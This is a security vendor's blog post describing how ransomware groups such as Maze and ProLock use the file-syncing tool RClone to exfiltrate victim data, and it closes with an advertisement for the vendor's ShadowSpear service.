Recently, in the ever-evolving world of advanced malware, Threat Actors have been making the shift from simply encrypting data to exfiltrating and distributing the information of their victims. Attackers understand by waiting after an initial compromise, they can sit and watch in order to sniff out important digital assets in an effort to steal them and apply further pressure on companies to pay up. This has been the case for the recent Los Angeles County breach involving DoppelPaymer Ransomware.
One of the newer methods of data exfiltration in ransomware attacks is through a legitimate file syncing tool called RClone. This command line based tool is used by many organizations in order to back up and store files into the cloud. SpearTip has detected the use of this tool in Maze ransomware attacks, and it has also been reported to be used with ProLock (formerly PwndLocker). RClone’s website directly states, “Over 40 cloud storage products support RClone including S3 object stores, business & consumer file storage services, as well as standard transfer protocols.” This means Threat Actors are able to easily use RClone to move data from their targets into the cloud very quickly and effectively. Once they posses this data, they may try to sell or simply leak this data to the public.
The topic of data exfiltration is prevalent in SpearTip’s everyday operations as we assist recovering companies effected by many different variants of ransomware. As our Director had stated, this hasn’t always been the case, and we are actively adapting to each change these Threat Groups make. With the assistance of SpearTip’s wide tool and skill sets, we have been able to help companies discover the data exfiltrated and assist with the Threat Actor communication.
Our proprietary tool, ShadowSpear® and elite cybersecurity engineers work around the clock for you, and stop attacks immediately before destroying your environment. Learn more about ShadowSpear® before becoming a victim of a cyberattack.